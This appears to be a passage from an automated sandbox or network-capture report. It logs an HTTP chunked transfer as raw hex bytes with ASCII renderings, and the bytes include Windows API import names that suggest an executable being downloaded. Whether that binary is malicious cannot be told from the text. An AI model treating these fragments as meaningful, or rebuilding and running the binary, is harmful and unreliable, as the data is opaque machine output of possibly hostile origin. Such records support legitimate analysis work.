                    2022-11-24 19:13:26 UTC96INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC104INData Raw: 00 00 95 01 47 65
                    Data Ascii: Ge
                    2022-11-24 19:13:26 UTC104INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC104INData Raw: 32 30 30 30 0d 0a 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 1a 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 e1 02 4c 43 4d 61 70 53 74 72 69 6e 67 41 00 00 e3 02 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 3d 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 40 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 e8 01 47 65 74 4c 6f 63 61 6c 65 49 6e 66 6f 41 00 00 41 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 fc 03 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 82 04 57 72 69 74 65 43 6f 6e 73 6f 6c 65 41 00 99 01 47 65 74 43 6f 6e 73 6f 6c 65 4f 75 74 70 75 74 43 50 00 00 8c 04 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 68 03 52 65 61 64 46 69 6c 65 00 00 43 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 78 00 43 72 65 61 74 65 46 69 6c
                    Data Ascii: 2000tConsoleModeMultiByteToWideCharLCMapStringALCMapStringW=GetStringTypeA@GetStringTypeWGetLocaleInfoAAFlushFileBuffersSetStdHandleWriteConsoleAGetConsoleOutputCPWriteConsoleWhReadFileCCloseHandlexCreateFil
                    2022-11-24 19:13:26 UTC112INData Raw: f5 8e f6 fe 55 78
                    Data Ascii: Ux
                    2022-11-24 19:13:26 UTC112INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC112INData Raw: 32 30 30 30 0d 0a c8 4e eb 11 3b b2 34 2a f5 90 d4 f2 92 72 f2 d8 09 cc 20 ff f1 71 87 aa 69 17 35 92 67 4b c3 a2 f9 dd 9a 69 b5 90 73 24 c7 b0 e5 7f ab 9c 76 b6 60 5e 47 a0 9d 93 3f 91 ea b3 21 e7 92 67 ae 99 d1 7e d0 15 45 89 bd bb 93 b4 9e 7a e9 ff 8a 76 b4 6d e8 46 ad b3 0a 9a 26 17 cd 86 bf f0 01 1a b5 30 5b e5 62 10 93 f1 28 8b 93 2e 57 9c 76 b5 a2 22 b9 f1 8e df 8b f0 32 70 1c 10 68 e1 83 f1 78 1e a3 d5 33 29 03 cb 03 99 fc e1 c2 b6 54 94 00 09 49 67 7f dc 57 57 71 80 27 0a 22 18 ca 9f de de 8f fb a0 61 30 d0 c1 45 90 b9 5b 89 e7 4b 8e 14 01 41 0d 7d 5d 94 15 4b bc bb 3c 51 ed 15 39 ff 8d 86 69 4c 94 13 95 d0 25 b8 12 9f f4 4c 69 6e b6 5b a0 69 77 18 76 b4 fd a4 aa f2 10 fe a8 3e aa bc 00 85 23 f0 d1 e4 0e 09 66 9c a8 97 39 c5 35 41 ea 51 97 60 d8
                    Data Ascii: 2000N;4*r qi5gKis$v`^G?!g~EzvmF&0[b(.Wv"2phx3)TIgWWq'"a0E[KA}]K<Q9iL%Lin[iwv>#f95AQ`
                    2022-11-24 19:13:26 UTC120INData Raw: 09 cb 0c 8d 13 fd
                    Data Ascii:
                    2022-11-24 19:13:26 UTC120INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC120INData Raw: 31 66 66 38 0d 0a 74 17 2d c5 9a 79 e9 f4 6a ea 90 bc f7 05 9b 22 5d 55 bc b4 ba eb e6 9b 43 f2 85 08 c6 ce ec 40 b0 30 1d 23 f6 a9 64 4c 2d ad 74 fe 8b 5f f3 37 99 e0 e8 1e 19 02 44 8a b7 58 38 44 c5 b9 b1 0d 64 0a 01 8e 6c f6 18 a6 d0 22 f9 4d 85 a7 3b 15 7f 36 d9 c4 7b b4 7c 27 6c 61 a4 d0 07 41 ec fe 47 db b8 0e 7f e5 70 f1 96 13 fb de af 77 c3 60 c3 52 bb 09 aa 93 98 56 23 d7 e8 18 b9 73 f7 f9 61 1b ed aa ab 81 b9 37 97 01 4f a4 14 3a ac 6d 49 46 3a 2a c5 1d e9 b5 4a 45 19 65 ee c3 95 03 56 30 02 43 14 92 e1 2a 5b bc 9e ba 82 5d c9 73 2b 72 a4 ee 74 8d 47 d4 97 6d 10 32 45 c3 c5 7b b0 1c d3 bd 11 7e b5 1f d0 20 a3 d0 0d 20 46 7f 40 c2 2c 70 8d 23 4f 91 a7 64 cd 0e 05 7a 71 de be 3f fc cc 43 1a 1a 95 cd 57 d9 d0 99 51 2e 80 a1 a5 71 1c 31 59 95 f6 a3
                    Data Ascii: 1ff8t-yj"]UC@0#dL-t_7DX8Ddl"M;6{|'laAGpw`RV#sa7O:mIF:*JEeV0C*[]s+rtGm2E{~ F@,p#Odzq?CWQ.q1Y
                    2022-11-24 19:13:26 UTC128INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC128INData Raw: 4f 14 02 27 75 21 0a 21 92 d8 0f 0f 6c 5a 20 56 ca 3b 3f 50 08 17 9a 7e 2d d5 42 62 71 18 7f 0c 8b aa e8 16 45 6c 55 01 f0 34 51 bc d0 fd 5c 3f a5 4a 8c 46 89 ed 82 dc 5c c4 3a cb 98 0d e7 a4 bc 2a e0 6c d5 58 d9 02 77 f6 21 d6 6a 3f 80 4b dc ff a5 c7 4d d7 93 ae 8a 84 b1 d5 2a bb b8 ef 9b 9a 2f ad bf ed 68 de 23 3a df 2d dd 8b 7e 7a b7 88 03 37 4e 35 68 c3 37 d8 68 1e 33 ef f4 08 1a 61 3f 75 51 4a 09 0b a2 79 f5 a3 78 ac 55 0a 1a a5 cc df 50 88 28 a2 51 01 bc b5 f3 9e 83 c0 1e d3 ab f5 1b 20 13 f9 90 99 d0 b7 2d 59 fe e8 9e 2e 28 4d 0b f2 98 c7 de 73 9e d7 5b e6 10 fe fb 72 c8 c1 9d 6d 21 88 93 ed 4e 33 c6 27 31 05 95 44 ed 8a e8 ca 6f c8 06 8d ca ee 08 18 d3 b5 08 cc 20 3a d4 84 f9 13 f1 a6 d1 5a 9b 91 bf 9e 3b 47 ca b6 85 65 bf ed 77 7d f9 3d ec 40 61
                    Data Ascii: O'u!!lZ V;?P~-BbqElU4Q\?JF\:*lXw!j?KM*/h#:-~z7N5h7h3a?uQJyxUP(Q -Y.(Ms[rm!N3'1Do :Z;Gew}=@a
                    2022-11-24 19:13:26 UTC136INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC136INData Raw: 32 30 30 30 0d 0a f3 cd 0a 3e 79 2d 81 7e 76 90 b7 34 b3 92 ed 71 dd c9 9f 79 49 3a 0b 2c 82 ce 86 07 72 f8 ca f4 32 13 d1 a3 33 d7 e0 35 aa 4b 4f df 40 2b 92 d9 43 b5 ca 0c 18 12 b0 d6 bf ef 5c 10 61 bd 64 8d 9f 11 8b 03 e4 bc 6a bb 48 dd ee 35 5f 25 b7 46 ba 42 c6 fc b1 57 2b 43 e4 d2 af 54 59 a4 34 9c df 63 93 4c 02 8f 02 cd d5 a7 a9 e1 eb 11 d4 a4 70 ad 96 07 df 1d 75 7b 8f 71 61 67 60 8c e2 7f f5 13 44 13 d3 ed 15 39 c9 ee ab 03 08 57 68 12 f3 ef 11 9f c6 8e 5c e7 e3 b4 47 21 d1 f7 21 4e 88 38 6a 28 8e 89 7d 0a 09 22 65 f3 44 47 b6 4f 4d 38 d8 7f 83 9a 03 cc de fd 96 17 ea 35 70 32 5d 5c 5b 1b 4d f5 8a ad 2c 53 50 79 7c 2e 45 40 64 f4 81 69 6b 19 f4 3c 64 7a 97 d9 a3 50 49 da b2 a1 74 c1 42 4c 9a ba 52 60 33 e9 25 de a2 7e 5c c6 fb fe ab fd 08 bc 1e
                    Data Ascii: 2000>y-~v4qyI:,r235KO@+C\adjH5_%FBW+CTY4cLpu{qag`D9Wh\G!!N8j(}"eDGOM85p2]\[M,SPy|.E@dik<dzPItBLR`3%~\
                    2022-11-24 19:13:26 UTC144INData Raw: 81 6b 3c c3 2f 12
                    Data Ascii: k</
                    2022-11-24 19:13:26 UTC144INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC144INData Raw: 32 30 30 30 0d 0a 15 d9 36 a5 e7 ab 72 3a 5d 5e c9 c3 41 f4 14 6b 8a 4e 2f b7 99 2c 5e 9e c8 e8 ee 01 19 54 8b 98 d0 86 3c 77 0f e7 2f 51 45 bc f7 c9 b2 65 dc 51 81 00 f9 c2 e0 7c bc 6e 18 12 b0 e1 91 8f 93 b0 e2 ca 20 28 fc 52 e4 05 a9 ea 0e 59 e1 4f 6f 03 46 67 e5 47 63 a0 b3 d1 a7 2a 29 d8 c9 21 86 90 8d 21 dc fb ce db c8 f8 39 d5 67 91 a2 33 1d 18 ec 04 51 d8 df 21 97 56 9c af f5 ad 00 3d f0 1c de f8 92 9f 81 37 75 92 d0 67 1a b7 8a 00 b2 7d 60 56 ac 3c ec cf d0 61 22 ae 10 f7 87 3e 2e f6 c0 f9 90 d3 83 ff 44 f8 87 a6 88 37 7e 7a d5 fc 0b e5 44 f4 05 7d d5 90 28 f7 a8 fb be 02 54 6a d1 2e 2a fa 0c 60 26 ef b2 b3 d1 ed a7 03 05 80 f9 95 39 50 2b 05 49 de 8c 53 b2 0e 40 db a6 8f e0 64 39 27 63 8e 54 89 bb 37 d6 9b e4 0c d7 5c 21 e5 0b 3d fe 31 4a 78 d3
                    Data Ascii: 20006r:]^AkN/,^T<w/QEeQ|n (RYOoFgGc*)!!9g3Q!V=7ug}`V<a">.D7~zD}(Tj.*`&9P+IS@d9'cT7\!=1Jx
                    2022-11-24 19:13:26 UTC152INData Raw: 4e 3f cd 0f f2 8d
                    Data Ascii: N?
                    2022-11-24 19:13:26 UTC152INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC152INData Raw: 32 30 30 30 0d 0a a6 9e 66 06 17 a5 bc 89 f2 51 72 8d 21 dd ea 55 ad de bc ba 84 1a 19 7d 7a db dd 2b 25 36 0e 6f 47 f7 7e 29 80 4f a8 31 19 95 61 a1 3c c2 9d f0 29 66 78 84 1a c0 e8 7a 84 44 b2 4c 70 42 87 e1 fa 2c 55 1a e8 57 0d c8 83 de 2f 8d 95 cd 25 19 80 ab 32 18 4c 4a 46 96 18 ea a4 96 8e f4 d0 6d aa d2 cf fb 2e 32 df 33 77 66 84 ad af 8b 1c 21 70 0c 6a 87 a8 bb ab eb 84 d5 3b 51 1f 3f f2 a2 81 7c b8 77 05 16 ce e0 0f b5 b4 af d0 c6 39 44 49 a8 0a c6 70 73 37 b5 ef 35 a6 43 3e 20 84 5b 77 fc 8e a3 eb 8d 76 73 29 0e 3e f4 18 ad c9 f9 db a3 c7 30 9f 8e c3 b8 e0 4a 4f cc f5 32 79 d0 41 6f c7 68 90 42 4d aa 5e ac f9 99 20 df aa 33 99 ea c0 59 a8 cb d8 e4 00 73 fb 46 e5 c0 97 45 a4 e8 91 19 da d7 26 6f 49 48 db 75 fb 3e 1c 93 94 bc 71 5f dd 0e de 64 d3
                    Data Ascii: 2000fQr!U}z+%6oG~)O1a<)fxzDLpB,UW/%2LJFm.23wf!pj;Q?|w9DIps75C> [wvs)>0JO2yAohBM^ 3YsFE&oIHu>q_d
                    2022-11-24 19:13:26 UTC160INData Raw: d1 47 1c 58 a7 ad
                    Data Ascii: GX
                    2022-11-24 19:13:26 UTC160INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC160INData Raw: 32 30 30 30 0d 0a 26 64 55 99 ad e2 68 f2 92 b6 99 c6 cd 57 c2 97 88 8b 4f 6e 7e 6c 7a e9 82 3b 93 a4 b7 c1 6c 4b a6 5e 9d 7d 87 59 ab 9b c8 00 ca b2 fb 37 54 90 9f 32 f0 86 ca ca aa a5 a6 72 62 fc 01 0c 67 ca b1 eb 87 f1 27 be a7 49 83 df 31 a1 23 ee c5 7c ea 81 99 40 98 de 65 dd 23 99 e2 9e ab 8a c6 c5 81 66 5f 9e 99 ad 01 10 5b 35 18 b1 2b ed e7 bf 9c 66 f0 97 dc c8 14 43 5d b9 62 46 11 30 73 09 cd 0d b6 e4 e4 fc e1 e3 dc f4 ad b7 c4 87 9c e2 40 57 6f c7 70 1b 06 dc d2 f5 d5 b5 23 0d ca 69 a6 a8 75 50 47 fe 65 ea 2a 97 60 90 79 46 51 46 77 ef e8 12 c3 f0 fc 6e 88 ca 3c df c1 24 11 ea 1f 3b b8 04 89 6b 16 85 15 aa 8e a1 93 81 fa 12 48 d3 0b 04 2a 85 bc 64 83 5a c4 4f 6a c9 f7 87 7a 4c cc bc d6 14 a1 f6 05 64 22 24 ec 5b 70 7a c2 b2 32 7b 4e f9 58 e3 c2
                    Data Ascii: 2000&dUhWOn~lz;lK^}Y7T2rbg'I1#|@e#f_[5+fC]bF0s@Wop#iuPGe*`yFQFwn<$;kH*dZOjzLd"$[pz2{NX
                    2022-11-24 19:13:26 UTC168INData Raw: d6 1c c8 1e c6 e4
                    Data Ascii:
                    2022-11-24 19:13:26 UTC168INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC168INData Raw: 32 30 30 30 0d 0a d5 a4 24 18 a7 f5 54 8e d4 54 2c 9d 60 4f 6c 70 bd eb 1a d6 c5 e8 6f e6 9a c9 1c 71 f8 ec 20 eb d2 6b 79 2f 0f f5 9d 94 de 39 15 41 f5 5d 69 1f 55 fc de fa 9b 63 6a 0d 3b a8 9d 43 9b fe eb af 81 3a 26 38 f6 d8 5b 80 ad 9f ea d0 44 42 26 fa 2b b1 8d 42 76 19 46 75 94 84 d0 31 a6 83 1e 2d d0 5a 4b 0c 86 42 cb 7e 39 86 9d 66 98 57 c8 ac 01 c5 b1 b8 3e 2c a6 ac 1b 1f 3d bc c7 18 b0 a3 a3 9f 27 06 cf 1e 9d d1 cf e2 17 55 7a 58 a4 c6 b0 35 31 43 38 71 12 bf 36 5e 54 f0 65 ed ad 94 d3 d5 1e 5a d1 57 1c 0a 66 53 ff eb 47 57 3b 63 e2 02 52 07 ca 35 83 06 a6 4b 84 8f 55 f4 ca 00 8f d3 d5 a4 c9 f4 9c 59 8c bd 6d f4 65 e1 cd b9 01 50 ff d3 f6 66 ed 8b 22 6e 04 66 cb b8 4a ed 01 26 4b b7 2f a5 d3 6a 9e 7c 03 5f 24 c9 23 a3 05 f5 93 72 2d 80 ba 96 4e
                    Data Ascii: 2000$TT,`Olpoq ky/9A]iUcj;C:&8[DB&+BvFu1-ZKB~9fW>,='UzX51C8q6^TeZWfSGW;cR5KUYmePf"nfJ&K/j|_$#r-N
                    2022-11-24 19:13:26 UTC176INData Raw: 96 d1 f6 23 18 7a
                    Data Ascii: #z
                    2022-11-24 19:13:26 UTC176INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC176INData Raw: 32 30 30 30 0d 0a 98 36 c4 13 bf 39 58 24 c2 d7 dc 54 b7 85 a8 dc d2 95 b0 00 93 a5 65 10 3f 60 df eb e6 44 84 9f e3 18 68 9d 26 3f ad 5a 62 73 32 c0 83 91 f8 1f 37 49 bf ff a7 49 af 84 dd 24 98 22 c2 41 1a 3f 51 70 6d 8d 5f 4e 14 bb db 21 55 9c 76 0f 99 29 d8 09 58 fe 7f 77 6a 5a a8 d5 cd 14 ea 52 fe 27 b5 05 4a 3c 65 ff 01 05 46 fb 08 68 9d c7 1b 9a 9e 45 5a 3c 57 cf 65 e2 eb 50 08 da c0 68 4e 65 29 0a bc ca 18 51 48 83 2e 88 c7 d1 a4 21 61 ee ff 21 e7 33 99 5b 20 29 18 93 01 b6 7f 0f 8d 14 c6 56 e4 f0 de fb 8b 74 66 88 fc a7 bc 1d 46 71 a1 bc e3 9d 36 14 94 81 31 ca bd 6f 71 5b e6 e5 fe 49 cf bc c0 ce b1 62 5b 31 4c dd 7a 03 4f 29 ee 1b 03 2e 1a f1 2b 57 57 63 89 05 0e 78 9a 05 b5 f3 c1 36 60 0b 1e 94 81 a6 aa c0 7c 23 cb c0 73 6c 07 de 61 26 7b 9e 2a
                    Data Ascii: 200069X$Te?`Dh&?Zbs27II$"A?Qpm_N!Uv)XwjZR'J<eFhEZ<WePhNe)QH.!a!3[ )VtfFq61oq[Ib[1LzO).+WWcx6`|#sla&{*
                    2022-11-24 19:13:26 UTC184INData Raw: 1b c0 1e 93 cc 7a
                    Data Ascii: z
                    2022-11-24 19:13:26 UTC184INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC184INData Raw: 31 66 66 38 0d 0a e7 81 2a 1e 57 c4 0c 68 57 84 28 30 bc d7 45 ef de d6 c8 e7 a3 db 64 95 f2 2a ff ff 61 2e 39 0c 28 6c 0f b0 43 4c 7e fb f5 14 5f 56 c5 09 e3 8b 79 4c b8 0b cc 94 68 d9 13 41 14 fd fd 48 a2 f2 b0 f5 d1 68 57 e5 53 ad f9 ee 62 e8 f3 83 10 6d d2 c3 67 91 1b 23 3d f7 02 5f 59 48 56 63 0b 38 43 cc 41 f2 02 65 ab 75 7a 7e 38 a9 97 88 8a d5 7b da 4e 9b 35 7d 72 79 d4 52 42 ab 88 f9 58 3f 79 ac 75 5d cc 6b 9e b9 c7 e6 b3 d3 28 ee 83 29 fc 8b b7 8a 0f 8a bf bf 2b fd a8 35 29 09 41 46 6e 4f 29 d1 8b c4 88 12 d6 58 8c 50 8b 0b 6a f6 14 ed 6f 9c ef 3c aa d5 24 12 e1 f8 03 51 39 e7 9c 7c 2d 8a 3b ac 74 3a 5e 9e 6b 62 2d 8b b4 6f 61 e2 da 75 62 b6 67 11 d4 f3 87 51 27 28 95 e3 cb 81 4a 79 4c 56 10 ca 26 5c d0 0d a6 bd b3 79 89 30 c2 66 90 f9 33 c0 47
                    Data Ascii: 1ff8*WhW(0Ed*a.9(lCL~_VyLhAHhWSbmg#=_YHVc8CAeuz~8{N5}ryRBX?yu]k()+5)AFnO)XPjo<$Q9|-;t:^kb-oaubgQ'(JyLV&\y0f3G
                    2022-11-24 19:13:26 UTC192INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC192INData Raw: 35 d9 47 2a a4 05 fb 5b 17 4b af f6 28 51 25 8f 4a 7f 59 a2 e5 0f 0a 72 11 58 48 34 df 11 c1 e6 80 5c 8f 30 cf 70 98 ec 88 65 60 ca 7f 50 03 b8 43 79 20 c0 af 86 a2 6e 8f a4 47 56 da 92 92 ed 72 0f 56 dc 57 fb f9 44 69 ef f2 cc b5 5a ec 40 1d 99 af ca ca 8d d6 a9 a8 d2 13 10 96 b0 f2 a3 b2 3c 66 ac b8 1d c7 a2 e9 cb a3 5a 79 65 38 94 71 24 a4 1d 5d a3 af 27 aa 79 81 92 d2 ee a8 45 48 fb 41 cf e4 62 85 32 86 11 07 b9 38 de 83 48 6b f2 cc b4 e1 40 09 98 78 94 26 d6 a3 cb 89 71 62 db 28 02 25 a9 5d 08 3f cd 9e f5 cb 62 8e f2 57 40 96 39 50 8d d4 51 e9 48 10 8d aa ec c8 3e d7 b1 0c a3 ec 50 43 8a a2 bb e3 1d c8 20 f5 42 42 cf 51 ba 88 bb ad e4 26 e4 31 24 9c 8b 97 f8 5b 59 32 89 6d 01 4b d8 bb 72 e9 48 ac dc 81 ad 51 72 f7 74 f3 e0 4d 8d be 32 89 c2 f5 d7 e9
                    Data Ascii: 5G*[K(Q%JYrXH4\0pe`PCy nGVrVWDiZ@<fZye8q$]'yEHAb28Hk@x&qb(%]?bW@9PQH>PC BBQ&1$[Y2mKrHQrtM2
                    2022-11-24 19:13:26 UTC200INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC200INData Raw: 32 30 30 30 0d 0a a5 60 44 32 6b 38 26 21 d7 25 39 35 39 8a 46 64 58 da 82 12 57 af 4c ce 6c 49 53 a0 87 82 45 9c 6a e2 0e e4 e2 8b 49 1d 96 11 70 17 61 f9 83 89 d5 67 d6 4f 3f 39 07 fc d2 34 03 28 b6 18 ee eb d9 26 d4 e8 73 e8 4e 37 84 6e 72 50 fd 3a 56 86 af fd ec af ed 48 e6 4b c2 8c 05 66 be 50 87 d5 7b df 52 b6 0e be 9d 79 fc ad 52 97 6b b3 af 17 24 db 89 7a 96 1b 37 9e 14 da e2 cb 5a 60 16 fb 44 db fc c8 d6 3e 0f 70 31 89 cf 34 6c b3 61 7a 60 12 77 ea 1d 67 20 96 41 f7 10 71 89 d3 59 d1 f9 80 2f 40 84 1b a8 a2 c1 66 46 95 fd 94 20 22 05 43 49 ff f5 8d ec 29 e2 7a 78 67 5c 98 33 89 21 d6 63 7d b8 14 c9 3a db 64 ae ba e9 36 9e 04 bc 59 56 2b 34 2e db bc e1 6f 47 d5 0d 98 f7 48 ad 65 14 d7 1f f9 d2 aa 3f ba 33 c4 a1 1a 71 46 df 3a b9 88 a4 23 8c a9 d9
                    Data Ascii: 2000`D2k8&!%959FdXWLlISEjIpagO?94(&sN7nrP:VHKfP{RyRk$z7Z`D>p14laz`wg AqY/@fF "CI)zxg\3!c}:d6YV+4.oGHe?3qF:#
                    2022-11-24 19:13:26 UTC208INData Raw: 95 b3 cb e3 50 dc
                    Data Ascii: P
                    2022-11-24 19:13:26 UTC208INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC208INData Raw: 32 30 30 30 0d 0a 9d 8c 3d 1b c8 6b c5 ec c6 cd 0c 5c aa 8b 09 c4 a6 a0 3f 31 c7 be 8b b2 b6 49 65 58 6b 32 34 95 be ee 3c e3 5b 0e de 64 5e 97 60 ba a8 52 7e 93 b1 f8 64 bc ef 1a 8f ea d3 56 d6 f8 56 69 ca 84 24 44 9c 3b f0 82 6a e9 08 3a 78 4f 55 d0 10 33 2b 33 d1 94 38 ea 74 70 2e 45 67 e8 b7 a6 46 32 f1 ea 3c 88 fe 3c f8 ee e6 6c 57 7a b3 e7 00 f4 7c 0b c3 ab 0c 76 e3 e8 06 d4 cd 99 7e 8e e4 34 ca d9 c7 80 63 48 55 03 f5 e0 4a f0 65 5b 3d b8 56 86 37 df 9d 3e f1 c2 91 6d 56 e7 da 66 2c d4 88 94 a6 0b 34 e8 58 16 e2 68 6d c7 c6 4d a8 e6 32 97 2a e6 ef 33 9b 7e 9b 69 2e 04 74 c2 09 c8 ec 23 50 dd 14 f4 23 db e9 0f f6 fe be d4 01 f4 de 03 f3 67 2d e4 56 60 78 8e 2f cf f3 2a 58 65 60 51 75 d9 eb 9e 48 1e cb d8 19 db c4 8a a3 bc b0 f2 fc 79 b5 18 12 0f b7
                    Data Ascii: 2000=k\?1IeXk24<[d^`R~dVVi$D;j:xOU3+38tp.EgF2<<lWz|v~4cHUJe[=V7>mVf,4XhmM2*3~i.t#P#g-V`x/*Xe`QuHy
                    2022-11-24 19:13:26 UTC216INData Raw: 50 4c 2d 37 00 b4
                    Data Ascii: PL-7
                    2022-11-24 19:13:26 UTC216INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC216INData Raw: 32 30 30 30 0d 0a 6e 8e 39 02 8b 52 d0 5a 9d 26 d6 b6 c4 36 c7 69 85 9c 8e 06 ac e5 31 ea 0e 1e 5e f0 f4 51 59 8c 52 02 ca 27 a1 64 5c 0c 51 bd b4 e4 fa 63 04 85 c5 0c 80 e4 e8 23 fe 91 4a 14 f9 d2 89 2d 58 2e 73 55 af 32 b2 cf 7b 72 bf 4e c2 98 35 26 84 8c 8f 3e 23 db 11 2f e9 5c e7 d8 5c ad 1b 53 08 e9 5e c5 34 27 90 4d f4 6d 34 bc 88 fc fd de 64 11 a3 e2 82 22 5a 13 06 78 b0 1f 88 dc a2 c8 7e cf ae 8f 90 de ef 5b 23 8a 29 22 aa 83 ef ed 24 a8 99 b5 0f 2d de 43 bc f6 40 3b 0e 0a 0e df 92 35 af fd 68 4c 17 3a b9 c4 5e e2 c6 ac 30 46 32 0b ec 79 74 06 16 22 af cd 6a 5a 79 1b ce 62 3c e3 bf bc 45 3b b5 40 3b 71 f3 c8 67 16 97 5e af ed ba 27 ff 2e d7 52 77 b6 03 5f 70 f4 42 8d 01 95 23 eb 5f cd 5b d4 d0 94 96 b2 17 c0 6a 2f 8f cc 5a 90 bb af 36 78 5c 8b 2f
                    Data Ascii: 2000n9RZ&6i1^QYR'd\Qc#J-X.sU2{rN5&>#/\\S^4'Mm4d"Zx~[#)"$-C@;5hL:^0F2yt"jZyb<E;@;qg^'.Rw_pB#_[j/Z6x\/
                    2022-11-24 19:13:26 UTC224INData Raw: 26 af 3e ce e0 14
                    Data Ascii: &>
                    2022-11-24 19:13:26 UTC224INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC224INData Raw: 32 30 30 30 0d 0a 0c d5 5c 60 2b c2 99 73 9a 0c bf 8b 26 2b 0b 48 70 e9 33 b5 f4 63 ee 88 88 de 7c 93 2a 67 e1 7c 91 34 a0 71 e5 b6 1b e3 ee ff 84 12 b0 f9 e0 e9 51 e3 cb da 9c c6 29 40 a1 a1 58 4c 51 85 86 30 b4 94 89 a7 7a 49 84 e6 e1 59 96 c4 1f 35 ca e5 3d bc c0 d2 e2 21 ab dc 21 88 18 a2 1a ef a3 a3 4e ee 1b a9 9b 2d 67 7e 15 e8 ac 1e 0a 78 b3 16 68 fa 1c 23 24 22 bd b4 18 10 81 37 9b 04 56 c0 af 68 81 e4 ce 46 79 27 fa 2c 0d 8d 7d 85 6a db 4a 0d 18 44 96 c9 35 74 fe d6 c4 b6 58 d4 68 8a a8 fc e0 fc d6 93 db 0d fe 62 75 4e 6c 3d c4 d1 e9 98 39 82 61 f6 07 0a ca 46 36 a5 5b f5 e2 7f c9 1b 30 d3 48 5d aa c9 1a f0 a8 9c cd 15 6f e3 88 62 fd a1 22 81 4c 7e 44 32 9d c2 fa ef c4 69 27 16 ff 60 13 e9 be bb 5e 14 cd 68 60 fb 59 76 0e 92 7b ab a0 36 a1 28 e9
                    Data Ascii: 2000\`+s&+Hp3c|*g|4qQ)@XLQ0zIY5=!!N-g~xh#$"7VhFy',}jJD5tXhbuNl=9aF6[0H]ob"L~D2i'`^h`Yv{6(
                    2022-11-24 19:13:26 UTC232INData Raw: 7d 36 83 2e a6 36
                    Data Ascii: }6.6
                    2022-11-24 19:13:26 UTC232INData Raw: 0d 0a
                    2022-11-24 19:13:26 UTC488INData Raw: 61 b0 1e 89 2e 7d
                    Data Ascii: a.}
                    2022-11-24 19:13:26 UTC488INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC488INData Raw: 32 30 30 30 0d 0a 87 1a 00 f3 64 7a 67 ad de 2c 5b a0 ee d5 60 7b 26 7b e0 c8 6a f7 10 38 d1 81 d5 04 a0 23 a8 7b 22 75 68 0b 3d 50 b3 c7 0e 02 8e c1 f1 d5 43 b7 c3 01 80 d5 14 3f 93 e7 76 f3 25 1d 12 fa e9 ee 98 bc dc 12 7b 0d b8 a6 13 73 8f 0a 29 40 84 0c 2c 43 29 d4 b3 d1 b2 27 1f 89 0d a9 4e b9 c0 2b 71 d5 b5 1e 07 c7 45 25 5d 6f d1 d6 a8 35 0a 94 76 1b 18 51 10 af d5 63 6a 54 87 86 cb 72 a4 c8 59 0f fb d0 42 b6 d9 68 b6 e8 5e 02 87 1e 88 40 29 6e 7d 22 f5 8a 62 0f 1a 2b 38 7f cd 1e 85 e1 90 30 87 c6 e8 16 b4 e4 41 76 af 99 da 86 9a 4a ec 06 a8 86 7a 76 43 a1 6f 66 d1 4c 38 82 4c df e8 39 45 ac c3 b2 3f 23 c5 95 74 c7 cc f1 3f 9c 7e 0a e7 88 32 cf 26 75 28 0b 18 e4 f1 9d b6 93 9c 7c db d3 2b 11 f8 58 e7 bb 32 e2 04 8a 40 73 65 18 fe dc 3f a9 f3 70 62
                    Data Ascii: 2000dzg,[`{&{j8#{"uh=PC?v%{s)@,C)'N+qE%]o5vQcjTrYBh^@)n}"b+80AvJzvCofL8L9E?#t?~2&u(|+X2@se?pb
                    2022-11-24 19:13:26 UTC496INData Raw: 00 00 00 00 00 00
                    Data Ascii:
                    2022-11-24 19:13:26 UTC496INData Raw: 0d 0a
                    Data Ascii:
